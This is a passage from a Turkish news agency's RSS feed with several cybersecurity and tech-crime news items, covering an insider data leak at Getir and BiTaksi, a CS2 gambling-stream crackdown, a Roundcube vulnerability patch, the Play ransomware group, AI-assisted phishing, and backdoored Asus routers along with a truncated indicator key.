<p data-start="2075" data-end="2120">Güvenilir siber güvenlik çözümleri kullanmak.</p>
</li>
</ul>
<p data-start="2122" data-end="2357">Kaspersky Güvenlik Araştırmacısı Lisandro Ubiedo, yapay zeka uygulamalarının çevrim dışı kullanımının avantajlarına dikkat çekerken, doğru önlemler alınmadığında bu tür kötü amaçlı yazılımların ciddi tehdit oluşturabileceğini belirtti.</p>
<p data-start="2359" data-end="2516"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Getir ve BiTaksi kullanıcılarına ait veriler karanlık ağda satışa sunuldu: Şirkete içeriden sızıldı</title>
            <link>https://cumha.com.tr/getir-ve-bitaksi-kullanicilarina-ait-veriler-karanlik-agda-satisa-sunuldu-sirkete-iceriden-sizildi</link>
            <guid>https://cumha.com.tr/getir-ve-bitaksi-kullanicilarina-ait-veriler-karanlik-agda-satisa-sunuldu-sirkete-iceriden-sizildi</guid>
            <description><![CDATA[ Getir ve BiTaksi sistemlerine içeriden erişim sağlanarak binlerce kullanıcıya ait kişisel verilerin çalındığı ortaya çıktı. Kurumsal e-posta hesabıyla veri çeken yazılımcının, şirket kurucusuna şantaj yaptığı iddiasıyla 13 yıla kadar hapsi istendi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202506/image_870x_684ab0015a15b.webp" length="53560" type="image/webp"/>
            
            <pubDate>Thu, 12 Jun 2025 13:46:58 +0300</pubDate>
            <dc:creator>Cansu Kırten</dc:creator>
            <media:keywords>Getir ve BiTaksi kullanıcı verileri nasıl sızdırıldı, şüpheli çalışanın sistemdeki rolü neydi, hangi bilgiler karanlık ağda paylaşıldı, şüpheli hakkında kaç yıl hapis isteniyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="404" data-end="407"><strong data-start="407" data-end="477">İstanbul Cumhuriyet Başsavcılığı Bilişim Suçları Soruşturma Bürosu</strong>, Getir ve BiTaksi platformlarına yönelik geniş kapsamlı bir soruşturma başlattı. Yapılan açıklamaya göre, her iki platformun sistemine izinsiz şekilde erişilerek kullanıcıların kişisel verileri ele geçirildi.</p>
<p></p>
<p data-start="690" data-end="964">Soruşturma dosyasına giren bilgilere göre, Getir'de yazılım mühendisi olarak çalışan Ferhat Y., sadece 20 gün içinde 2 bin 890 kullanıcıya ait isim, soy isim, adres, telefon, e-posta, seyahat ve sipariş bilgilerini sistemden çekerek sosyal medya ve karanlık ağda paylaştı.</p>
<p data-start="966" data-end="1282"><strong data-start="966" data-end="1013">Şirket kurucusuna şantaj mesajları gönderdi</strong><br data-start="1013" data-end="1016">İddialara göre Ferhat Y., elde ettiği milyonlarca satırlık veriyi Getir ve BiTaksi'nin kurucusu Nazım Salur'a e-posta yoluyla tehdit amaçlı gönderdi. 'Nazım Bey' takma adıyla gönderilen mesajlarda verilerin üçüncü şahıslara ya da medyaya satılabileceği ima edildi.</p>
<p data-start="1284" data-end="1571"><strong data-start="1284" data-end="1337">Veri sorgulamaları ve dijital izler tespit edildi</strong><br data-start="1337" data-end="1340">Yapılan teknik analizde, Ferhat Y.'nin ferhat.y***@getir.com** uzantılı kurumsal hesabından 23 Şubat – 11 Mart 2023 tarihleri arasında çok sayıda veri sorgusu yaptığı ve her sorguda 2 binin üzerinde satır veri çektiği belirlendi.</p>
<p data-start="1573" data-end="1770">Savcılık, şüpheli hakkında TCK 244 (bilişim sistemine girme), TCK 136 (kişisel verileri hukuka aykırı elde etme) ve TCK 107 (şantaj) suçlamalarıyla 5 yıldan 13 yıla kadar hapis cezası talep etti.</p>
<p data-start="1772" data-end="2099"><strong data-start="1772" data-end="1817">Siber güvenlik önlemleri yeniden gündemde</strong><br data-start="1817" data-end="1820">Türkiye’nin en yaygın dijital servislerinden olan Getir ve BiTaksi’ye yönelik bu sızıntı, içeriden gelen tehditlerin ciddiyetini bir kez daha gündeme taşıdı. Uzmanlar, şirketlerin iç tehditlere karşı siber güvenlik protokollerini yeniden değerlendirmesi gerektiğini vurguluyor.</p>
<p data-start="2101" data-end="2296"><strong data-start="2101" data-end="2113"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>CS2 yayınlarına kumar baskını: 10 fenomen gözaltına alındı, Key Drop’a erişim engeli geldi</title>
            <link>https://cumha.com.tr/cs2-yayinlarina-kumar-baskini-10-fenomen-goezaltina-alindi-key-dropa-erisim-engeli-geldi</link>
            <guid>https://cumha.com.tr/cs2-yayinlarina-kumar-baskini-10-fenomen-goezaltina-alindi-key-dropa-erisim-engeli-geldi</guid>
            <description><![CDATA[ Counter-Strike 2&#039;de sanal kasa açan yayıncılar, “kumar oynamaya teşvik” suçlamasıyla gözaltına alındı. Milyon takipçili fenomenlerin dahil olduğu operasyonda Key Drop sitesine de erişim engeli getirildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202506/image_870x_684ab00f09977.webp" length="10696" type="image/webp"/>
            
            <pubDate>Thu, 12 Jun 2025 13:46:47 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>CS2 kasa açan yayıncılar kimler, Key Drop neden kapatıldı, kaç kişi gözaltına alındı, soruşturmayı hangi savcılık yürütüyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="350" data-end="353"><strong data-start="353" data-end="386">CS2 kasaları yeniden gündemde</strong><br data-start="386" data-end="389">Valve’in popüler çevrim içi oyunu Counter-Strike 2 (CS2) içindeki sanal kasa sistemi, Türkiye’de “kumar” tartışmalarının odağı haline geldi. Oyuncuların rastgele oyun içi ürünler kazanabildiği bu kasaların bazı eşyaları 1 liradan başlayıp on binlerce liraya kadar değer kazanabiliyor.</p>
<p></p>
<p data-start="677" data-end="1020"><strong data-start="677" data-end="720">Key Drop yayınları mercek altına alındı</strong><br data-start="720" data-end="723">Sanal kasa açma sistemini farklı şekilde sunan Key Drop adlı internet sitesi, Türkiye’deki pek çok yayıncıyla iş birliği içerisinde çalışıyor. Site üzerinden yayın yapan ve kasalardan yüksek değerli eşyalar kazanma umuduyla içerik üreten yayıncılar, yasa dışı bahis kapsamında incelemeye alındı.</p>
<p data-start="1022" data-end="1377"><strong data-start="1022" data-end="1053">10 yayıncı gözaltına alındı</strong><br data-start="1053" data-end="1056">İstanbul Cumhuriyet Başsavcılığı Bilişim Suçları Soruşturma Bürosu tarafından yürütülen soruşturma çerçevesinde, Siber Suçlarla Mücadele ekipleri Twitch, YouTube, TikTok ve Instagram gibi platformlardaki Key Drop yayınlarını inceledi. Operasyon kapsamında 19 şüpheli hakkında işlem başlatıldı; 10 kişi gözaltına alındı.</p>
<p data-start="1379" data-end="1704"><strong data-start="1379" data-end="1421">Gözaltına alınan fenomenler belli oldu</strong><br data-start="1421" data-end="1424">Demirören Haber Ajansı’nın (DHA) aktardığı bilgiye göre gözaltına alınan fenomen yayıncılar arasında Kemal Can Parlak, Ferit Karakaya, Necati Akçay, Tolunay Ören, Ferhat Can Dama, Ömer Faruk Karataş, Mert Kancefer, Furkan Burak Bayrak, Duru Batır ve Eray Can Özkenar yer alıyor.</p>
<p data-start="1706" data-end="1957"><strong data-start="1706" data-end="1738">Key-drop.com’a erişim engeli</strong><br data-start="1738" data-end="1741">Ankara 12. Sulh Ceza Hakimliği’nin 08 Mayıs 2025 tarihli kararıyla Key Drop internet sitesine Türkiye’den erişim engeli getirildi. Site, yasa dışı bahis ve kumar faaliyetlerine teşvik ettiği gerekçesiyle kapatıldı.</p>
<p data-start="1959" data-end="2158"><strong data-start="1959" data-end="1988">Diğer şüpheliler aranıyor</strong><br data-start="1988" data-end="1991">Yetkililer, 5 şüphelinin yurtdışında, 2 kişinin şehir dışında olduğunu, 1 kişinin ise firari durumda olduğunu açıkladı. 1 şüphelinin ise adliyeye gelmesi bekleniyor.</p>
<p data-start="2160" data-end="2302"><strong data-start="2160" data-end="2172"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Medium Yazarı Enes Uyardı: Türkiye’deki Kritik Kurumlarda İsrail Menşeli Yazılımlar Kullanılıyor</title>
            <link>https://cumha.com.tr/medium-yazari-enes-uyardi-turkiyedeki-kritik-kurumlarda-israil-menseli-yazilimlar-kullaniliyor</link>
            <guid>https://cumha.com.tr/medium-yazari-enes-uyardi-turkiyedeki-kritik-kurumlarda-israil-menseli-yazilimlar-kullaniliyor</guid>
            <description><![CDATA[ Medium platformunda yazdığı dikkat çekici analizde Enes adlı kullanıcı, Türkiye’de kamu ve özel sektör tarafından kullanılan İsrail merkezli siber güvenlik yazılımlarının ciddi güvenlik riskleri taşıdığını vurguladı. Yazıda, bu şirketlerin yöneticilerinin İsrail ordusu ve istihbarat geçmişine dikkat çekildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202506/image_870x_6849e51907bd8.webp" length="82374" type="image/webp"/>
            
            <pubDate>Wed, 11 Jun 2025 23:20:56 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Medium yazarı Enes hangi güvenlik risklerine dikkat çekti, Türkiyede hangi İsrail menşeli yazılımlar kullanılıyor, bu şirketlerin yöneticilerinin geçmişi neden önemli, kamu kurumları bu yazılımlardan neden vazgeçmeli</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="458" data-end="461"><strong data-start="461" data-end="518">Medium yazarı Enes’ten çarpıcı siber güvenlik analizi</strong><br data-start="518" data-end="521">Medium platformunda yayınladığı bir yazıyla dikkat çeken Enes adlı kullanıcı, Türkiye’de kamu ve özel sektör kuruluşlarında kullanılan İsrail menşeli siber güvenlik yazılımlarına dair ciddi uyarılarda bulundu. Enes’in aktardığına göre bu yazılımlar, sadece ekonomik değil, aynı zamanda ulusal güvenlik açısından da riskler barındırıyor.</p>
<p></p>
<p data-start="859" data-end="1267"><strong data-start="859" data-end="904">İsrail’in siber güvenlikteki rolü büyüyor</strong><br data-start="904" data-end="907">İsrail, siber güvenlik ve bilişim altyapıları konusunda dünyada önde gelen ülkeler arasında yer alıyor. Ülke, devlet destekli projeler ve Silikon Vadisi’ndeki Yahudi lobisinin etkisiyle global pazarda büyük bir pay elde etmiş durumda. Enes, bu altyapının arkasında sıklıkla İsrail ordusu ve istihbarat kurumlarında görev almış kişilerin bulunduğunu vurguluyor.</p>
<p data-start="1269" data-end="1417"><strong data-start="1269" data-end="1311">Türkiye’de hangi ürünler kullanılıyor?</strong><br data-start="1311" data-end="1314">Yazıda, Türkiye'de kullanılan ve İsrail merkezli dört ana şirketin ürünleri detaylı olarak inceleniyor:</p>
<ul data-start="1419" data-end="2257">
<li data-start="1419" data-end="1633">
<p data-start="1421" data-end="1633"><strong data-start="1421" data-end="1463">CheckPoint Software Technologies Ltd.:</strong> Tel Aviv merkezli şirket, siber güvenlik duvarları ve VPN hizmetleri sunuyor. Enes, şirketin birçok yöneticisinin İsrail devletiyle doğrudan ilişkili olduğunu aktarıyor.</p>
</li>
<li data-start="1635" data-end="1862">
<p data-start="1637" data-end="1862"><strong data-start="1637" data-end="1651">CheckMarx:</strong> Yazılım kodlarının güvenlik analizini yapan bu şirketin ürünleri Türkiye’de de yazılım geliştirme süreçlerinde kullanılıyor. Şirketin CTO’su Maty Siman’ın İsrail Başbakanlığı ve IDF geçmişi olduğu belirtiliyor.</p>
</li>
<li data-start="1864" data-end="2041">
<p data-start="1866" data-end="2041"><strong data-start="1866" data-end="1893">CyberArk Software Ltd.:</strong> Kimlik ve erişim yönetimi ürünleri sunan bu şirketin yöneticilerinin büyük kısmı İsrail Silahlı Kuvvetleri ve istihbarat birimlerinde görev yapmış.</p>
</li>
<li data-start="2043" data-end="2257">
<p data-start="2045" data-end="2257"><strong data-start="2045" data-end="2055">JFrog:</strong> CI/CD süreçlerinde kullanılan yazılım dağıtım platformu JFrog’un da yöneticilerinin çoğu İsrail kökenli. Binary yönetimi ve güvenlik taramaları sağlayan ürünleri Türkiye'de yaygın biçimde kullanılıyor.</p>
</li>
</ul>
<p data-start="2259" data-end="2618"><strong data-start="2259" data-end="2302">Veri güvenliği ve bağımlılık eleştirisi</strong><br data-start="2302" data-end="2305">Enes, yazısında bu yazılımlar üzerinden ülke dışına sızabilecek verilerin, Türkiye’nin stratejik bilgilerini tehlikeye atabileceğini öne sürüyor. Yazılım ve bilişim sektöründe alternatif ürünler geliştirilmesi gerektiğini savunuyor ve kamu kurumlarının bu konuda daha bilinçli hareket etmesi çağrısında bulunuyor.</p>
<p data-start="2620" data-end="2877"><strong data-start="2620" data-end="2645">Bilgi kaynakları açık</strong><br data-start="2645" data-end="2648">Yazıda yer alan tüm yönetici bilgileri ve şirket açıklamaları, doğrudan ilgili firmaların resmi internet sitelerinde yayımlanan açık kaynak bilgilerden derlenmiş durumda. Enes, bu bilgileri okuyucularla şeffaf biçimde paylaşıyor.</p>
<p data-start="2879" data-end="3113"><strong data-start="2879" data-end="2891"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Roundcube'da Uzaktan Kod Çalıştırma Açığı Tespit Edildi: Plesk Hızla Güncelleme Yayınladı</title>
            <link>https://cumha.com.tr/roundcubeda-uzaktan-kod-calistirma-acigi-tespit-edildi-plesk-hizla-guncelleme-yayinladi</link>
            <guid>https://cumha.com.tr/roundcubeda-uzaktan-kod-calistirma-acigi-tespit-edildi-plesk-hizla-guncelleme-yayinladi</guid>
            <description><![CDATA[ Roundcube Webmail sisteminde tespit edilen kritik güvenlik açığı (CVE-2025-49113) sonrası, Plesk 5 Haziran&#039;da güncelleme yayınladı. Uzaktan kod çalıştırmaya neden olabilecek bu açık, milyonlarca sunucuyu etkileyebilir. Güncelleme yapılması önemle tavsiye ediliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202506/image_870x_6847fa6e826bc.webp" length="83722" type="image/webp"/>
            
            <pubDate>Tue, 10 Jun 2025 12:28:06 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Roundcube güvenlik açığı nedir, Plesk hangi sürümlerde güncelleme yaptı, güncelleme almayan sunucular ne yapmalı, Plesk yaşam döngüsü politikası nedir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="394" data-end="397"><strong data-start="397" data-end="449">Roundcube'da kritik güvenlik açığı tespit edildi</strong><br data-start="449" data-end="452">Roundcube Webmail'in 1.5.10 öncesi ve 1.6.x serisinin 1.6.11 öncesi sürümlerinde, uzaktan kod çalıştırmaya olanak tanıyan kritik bir güvenlik açığı keşfedildi. Güvenlik açığı, CVE-2025-49113 koduyla kayda geçti.</p>
<p></p>
<p data-start="665" data-end="1017"><strong data-start="665" data-end="696">Plesk hızlıca müdahale etti</strong><br data-start="696" data-end="699">Bu açığın kamuoyuna duyurulmasının ardından Plesk, 5 Haziran tarihinde güncelleme yayımlayarak güvenlik zafiyetini giderdi. Güncellemenin, Plesk paneline sahip sunuculara otomatik olarak ulaşması bekleniyor. Ancak kullanıcıların kendi sistemlerinde güncellemenin yüklü olduğundan emin olmaları önemle tavsiye ediliyor.</p>
<p data-start="1019" data-end="1163"><strong data-start="1019" data-end="1079">Hangi sürümler etkileniyor, hangi güncellemeler gerekli?</strong><br data-start="1079" data-end="1082">Plesk yetkilileri, güvenlik açığının giderildiği güncellemeleri şöyle sıraladı:</p>
<ul data-start="1164" data-end="1235">
<li data-start="1164" data-end="1199">
<p data-start="1166" data-end="1199">Plesk Obsidian 18.0.70 Update 1</p>
</li>
<li data-start="1200" data-end="1235">
<p data-start="1202" data-end="1235">Plesk Obsidian 18.0.69 Update 4</p>
</li>
</ul>
<p data-start="1237" data-end="1328">Sistemi bu sürümlerden daha eski olan kullanıcıların derhal güncelleme yapmaları gerekiyor.</p>
<p data-start="1330" data-end="1597"><strong data-start="1330" data-end="1373">Alternatif çözüm: Sunucular arası geçiş</strong><br data-start="1373" data-end="1376">Güncellemeyi doğrudan alamayan kullanıcılar için Plesk, sunucular arası geçiş (server-to-server migration) seçeneğini öneriyor. Böylelikle daha güncel bir Plesk sürümüne geçilerek güvenlik açıklarının önüne geçilebiliyor.</p>
<p data-start="1599" data-end="1853"><strong data-start="1599" data-end="1659">Plesk yaşam döngüsü politikası göz önünde bulundurulmalı</strong><br data-start="1659" data-end="1662">Güncelleme desteği bulunmayan eski sürümler için kullanıcıların Plesk'in yaşam döngüsü (Lifecycle Policy) kurallarını incelemeleri ve uzun vadeli çözümler geliştirmeleri gerektiği vurgulandı.</p>
<p data-start="1855" data-end="2018"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Play Fidye Yazılım Grubu Alarm Veriyor: Her Saldırıya Özel Virüs, Telefonla Tehdit, VMware'lere Özel Şifreleme!</title>
            <link>https://cumha.com.tr/play-fidye-yazilim-grubu-alarm-veriyor-her-saldiriya-ozel-virus-telefonla-tehdit-vmwarelere-ozel-sifreleme</link>
            <guid>https://cumha.com.tr/play-fidye-yazilim-grubu-alarm-veriyor-her-saldiriya-ozel-virus-telefonla-tehdit-vmwarelere-ozel-sifreleme</guid>
            <description><![CDATA[ CISA&#039;nın 4 Haziran 2025 tarihli raporuna göre, Play fidye yazılım grubu 2024&#039;ün en aktif siber tehditlerinden biri haline geldi. 900’e yakın kurumu hedef alan grup, yeni açıklanan bir güvenlik açığını kullanarak sistemlere sızıyor ve artık doğrudan kurbanları arayarak tehdit ediyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202506/image_870x_6845b677af178.webp" length="66444" type="image/webp"/>
            
            <pubDate>Sun, 08 Jun 2025 19:13:05 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Play grubu hangi güvenlik açığını kullanıyor, VMware sistemlerde nasıl bir saldırı yöntemi izleniyor, GRIXBA nedir ve ne işe yarıyor, kurbanlara telefonla nasıl tehditlerde bulunuluyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="451" data-end="786"><strong data-start="451" data-end="487">Play Grubu 900 Kurumu Hedef Aldı</strong><br data-start="487" data-end="490">ABD Federal Soruşturma Bürosu (FBI) verilerine göre Play fidye yazılım grubu, bugüne kadar yaklaşık 900 kurumu hedef aldı. Grup, yalnızca saldırı sayısını artırmakla kalmadı, aynı zamanda saldırı tekniklerini de çeşitlendirdi. 2025 Mayıs itibarıyla aktif saldırılar gerçekleştirmeye devam ediyor.</p>
<p data-start="788" data-end="1131"><strong data-start="788" data-end="830">Yeni Saldırı Yöntemi: SimpleHelp Açığı</strong><br data-start="830" data-end="833">CVE-2024-57727 kodlu güvenlik açığı 16 Ocak 2025'te kamuoyuna duyuruldu. Play grubu ve ona bağlı tehdit aktörleri, bu zafiyeti hızla istismar etmeye başladı. SimpleHelp isimli uzak masaüstü erişim aracı üzerinden sistemlere sızan grup, bu yazılımı kullanan kuruluşlara güncelleme çağrısı yapılıyor.</p>
<p data-start="1133" data-end="1432"><strong data-start="1133" data-end="1168">Her Kurbana Özel Fidye Yazılımı</strong><br data-start="1168" data-end="1171">Play grubu, tespit edilmemek için fidye yazılımı dosyalarını her saldırı için yeniden derliyor. Bu da her kurban için benzersiz bir virüs oluşmasına yol açıyor. Antivirüs yazılımları için tespiti zorlaştıran bu yöntem, grubun teknik kapasitesini ortaya koyuyor.</p>
<p data-start="1434" data-end="1782"><strong data-start="1434" data-end="1473">Yeni Tehdit Türü: Telefonla Gözdağı</strong><br data-start="1473" data-end="1476">Grup yalnızca e-posta ile değil, artık doğrudan kurbanları telefonla arayarak tehdit ediyor. Kurumların farklı birimlerine ait numaralara ulaşarak, 'verilerinizi sızdırırız' şeklinde baskı kuruyorlar. Her kurban için özel olarak oluşturulan "@gmx.de" veya "@web.de" uzantılı e-posta adresleri kullanılıyor.</p>
<p data-start="1784" data-end="2096"><strong data-start="1784" data-end="1817">VMware Sistemler Özel Hedefte</strong><br data-start="1817" data-end="1820">Play grubu, VMware ESXi hipervizör sistemleri için özel olarak tasarlanmış bir fidye yazılımı geliştirdi. Sanal makineleri kapatıp, sanal makine dosyalarını AES-256 şifreleme ile kilitliyor. Aynı zamanda sistem arayüzündeki karşılama mesajını da fidye notuyla değiştiriyorlar.</p>
<p data-start="2098" data-end="2343"><strong data-start="2098" data-end="2133">Kendi Casus Yazılımları: GRIXBA</strong><br data-start="2133" data-end="2136">GRIXBA isimli bilgi hırsızlığı yazılımı, grubun geliştirdiği özel bir casus araç. Bu yazılım, ağ yapılarını tarıyor, antivirüs yazılımlarını tespit ediyor ve Zabbix 2023 kimliği altında gizlenmeye çalışıyor.</p>
<p data-start="2345" data-end="2450"><strong data-start="2345" data-end="2369">Kurumlar Ne Yapmalı?</strong><br data-start="2369" data-end="2372">CISA’nın önerilerine göre, alınması gereken önlemler şu şekilde sıralanıyor:</p>
<ol data-start="2451" data-end="2715">
<li data-start="2451" data-end="2497">
<p data-start="2454" data-end="2497">CVE-2024-57727 yamasını derhal uygulayın.</p>
</li>
<li data-start="2498" data-end="2587">
<p data-start="2501" data-end="2587">Özellikle VPN ve e-posta sistemlerinde çok faktörlü kimlik doğrulamayı devreye alın.</p>
</li>
<li data-start="2588" data-end="2629">
<p data-start="2591" data-end="2629">Ağ segmentasyonunuzu gözden geçirin.</p>
</li>
<li data-start="2630" data-end="2673">
<p data-start="2633" data-end="2673">Çevrimdışı yedeklerinizi kontrol edin.</p>
</li>
<li data-start="2674" data-end="2715">
<p data-start="2677" data-end="2715">Olay müdahale planınızı güncelleyin.</p>
</li>
</ol>
<p data-start="2717" data-end="2940">Play grubu artık sadece bir fidye yazılım grubu değil, organize bir siber suç ağı halini aldı. Hızlı teknik adaptasyonları, yeni açıkları hızla kullanmaları ve psikolojik baskı yöntemleriyle ciddi bir tehdit oluşturuyorlar.</p>
<p data-start="2942" data-end="3143"><strong data-start="2942" data-end="2954"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Trump döneminin üst düzey isminin telefonu ele geçirildi, yapay zekâ ile personel tuzağa düşürüldü</title>
            <link>https://cumha.com.tr/trump-doeneminin-ust-duzey-isminin-telefonu-ele-gecirildi-yapay-zeka-ile-personel-tuzaga-dusuruldu</link>
            <guid>https://cumha.com.tr/trump-doeneminin-ust-duzey-isminin-telefonu-ele-gecirildi-yapay-zeka-ile-personel-tuzaga-dusuruldu</guid>
            <description><![CDATA[ Donald Trump&#039;ın personel müdürü Susie Wiles’a ait iPhone&#039;un siber saldırganlarca ele geçirildiği ve rehberdeki isimlere yapay zekâ ile ses ve görüntü taklidiyle oltalama mesajları gönderildiği ortaya çıktı. FBI olay sonrası devreye girdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202506/image_870x_683ff7e0c202b.webp" length="34014" type="image/webp"/>
            
            <pubDate>Wed, 04 Jun 2025 10:38:18 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Trump dönemindeki siber saldırının hedefi kimdi, saldırganlar hangi yöntemleri kullandı, FBI sürece nasıl müdahil oldu, yapay zekâ siber saldırılarda nasıl kullanılıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="393" data-end="396"><strong data-start="396" data-end="462">Beyaz Saray’da güvenlik açığı siber saldırganlara fırsat verdi</strong><br data-start="462" data-end="465">Donald Trump döneminde personel müdürlüğü görevinde bulunan Susie Wiles’a ait kişisel iPhone cihazı, siber saldırganlar tarafından ele geçirildi. FBI tarafından yapılan açıklamaya göre, saldırganlar cihaza erişim sağladıktan sonra rehberdeki numaralara ulaştı. Rehberde Beyaz Saray personeli ve bazı tanınmış kişilerin iletişim bilgilerinin de bulunduğu belirtildi.</p>
<p></p>
<p data-start="834" data-end="1211"><strong data-start="834" data-end="885">Yapay zekâ ile sahte ses ve yüz taklidi yapıldı</strong><br data-start="885" data-end="888">Saldırganlar, Wiles’ın sesini ve yüzünü yapay zekâ teknolojileriyle taklit ederek rehberdeki kişilere mesajlar göndermeye başladı. Mesaj içeriklerinde, hedeflenen kişileri sohbet etmeye ikna etme ve Telegram uygulamasına yönlendirme girişimleri tespit edildi. Bu yöntemle oltalama saldırısı gerçekleştirildiği bildirildi.</p>
<p data-start="1213" data-end="1522"><strong data-start="1213" data-end="1253">FBI müdahale etti, güvenlik sağlandı</strong><br data-start="1253" data-end="1256">Söz konusu mesajların ardından personelin şüphelenerek durumu fark etmesi üzerine olay Federal Soruşturma Bürosu’na (FBI) bildirildi. FBI, soruşturmayı başlattığını ve hem Susie Wiles’ın telefonu hem de diğer personel cihazlarında güvenliğin sağlandığını açıkladı.</p>
<p data-start="1524" data-end="1782"><strong data-start="1524" data-end="1569">Daha önce de siber saldırı hedefi olmuştu</strong><br data-start="1569" data-end="1572">Henüz iPhone cihazının tam olarak nasıl ele geçirildiği bilinmiyor. Ancak daha önce, 2023 yılında İranlı siber saldırganlar tarafından Wiles’ın kişisel e-posta hesabının da ele geçirildiği bilgisi paylaşıldı.</p>
<p data-start="1784" data-end="1971"><strong data-start="1784" data-end="1796"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>9.000 Asus router cihazı sessizce ele geçirildi: Kalıcı arka kapı tespit edildi</title>
            <link>https://cumha.com.tr/9000-asus-router-cihazi-sessizce-ele-gecirildi-kalici-arka-kapi-tespit-edildi</link>
            <guid>https://cumha.com.tr/9000-asus-router-cihazi-sessizce-ele-gecirildi-kalici-arka-kapi-tespit-edildi</guid>
            <description><![CDATA[ GreyNoise tarafından yayımlanan rapora göre, dünya genelinde yaklaşık 9.000 Asus router cihazına saldırganlar tarafından gizli bir SSH anahtarı yerleştirildi. Bu kalıcı arka kapı, cihaz yeniden başlatılsa ya da yazılımı güncellense bile yönetici erişimi sağlamaya devam ediyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_68395b08dcfe3.webp" length="10968" type="image/webp"/>
            
            <pubDate>Fri, 30 May 2025 10:15:30 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Hangi Asus router modelleri etkilenmiş olabilir, SSH arka kapısı nasıl çalışıyor, kullanıcılar cihazlarının ele geçirilip geçirilmediğini nasıl anlar, saldırının arkasında kim olabilir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="409" data-end="412"><strong data-start="412" data-end="460">GreyNoise, kalıcı arka kapıyı ortaya çıkardı</strong><br data-start="460" data-end="463">Güvenlik şirketi GreyNoise tarafından yayımlanan son rapora göre, dünya genelinde yaklaşık 9.000 Asus marka router cihazı, kullanıcıların bilgisi dışında gizli bir arka kapı ile ele geçirilmiş durumda. Saldırganların, daha önce Asus tarafından yaması yayınlanan ancak bazıları kamuoyunda pek bilinmeyen güvenlik açıklarını kullanarak router cihazlarına erişim sağladığı belirtiliyor.</p>
<p></p>
<p data-start="848" data-end="1151"><strong data-start="848" data-end="890">CVE-2023-39780 açığı kritik rol oynadı</strong><br data-start="890" data-end="893">Kullanılan açıklardan biri CVE-2023-39780 olarak tanımlanan komut enjeksiyon açığı. Bunun yanı sıra CVE sistemi üzerinden takip edilmeyen açıkların da kullanıldığı bildirildi. Bu da saldırının iz bırakmadan ve dikkat çekmeden gerçekleşmesini kolaylaştırıyor.</p>
<p data-start="1153" data-end="1635"><strong data-start="1153" data-end="1193">Kalıcı kontrol sağlayan SSH anahtarı</strong><br data-start="1193" data-end="1196">Sisteme sızan saldırganlar, router cihazına özel bir SSH anahtarı yerleştirerek kalıcı erişim elde ediyor. Bu anahtara sahip olan kişiler, cihazlara yönetici haklarıyla otomatik olarak bağlanabiliyor. Daha da çarpıcı olan ise, bu erişimin cihaz yeniden başlatıldığında veya firmware güncellemeleri yapıldığında bile geçerliliğini sürdürmesi. GreyNoise araştırmacıları, bu durumun cihazlar üzerinde kalıcı bir kontrol sağladığını aktarıyor.</p>
<p data-start="1637" data-end="2206"><strong data-start="1637" data-end="1677">Devlet destekli siber tehdit şüphesi</strong><br data-start="1677" data-end="1680">Araştırmalara göre, saldırılar Malezya, Avrupa ve Asya kaynaklı IP adreslerinden geliyor. Bu da saldırının arkasında devlet destekli bir aktör olabileceği ihtimalini gündeme getiriyor. İlk belirtiler Mart ayının ortasında tespit edildi ve durum, GreyNoise tarafından ilgili devlet kurumlarına bildirildikten sonra kamuoyuna duyuruldu. Güvenlik firması Sekoia da geçtiğimiz hafta benzer verileri paylaştı. Sekoia'nın analizlerine göre saldırı, ViciousTrap adlı bilinmeyen bir tehdit grubu tarafından gerçekleştirilmiş olabilir.</p>
<p data-start="2208" data-end="2457"><strong data-start="2208" data-end="2236">Kullanıcılar ne yapmalı?</strong><br data-start="2236" data-end="2239">Asus router kullanıcılarının cihazlarını kontrol etmeleri öneriliyor. SSH ayarlarında şu yapılandırmanın bulunup bulunmadığına dikkat edilmeli:<br data-start="2382" data-end="2385"><em data-start="2385" data-end="2457">ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAo41nBoVFfj4HlVMGV+YPsxMDrMlbdDZ...</em></p>
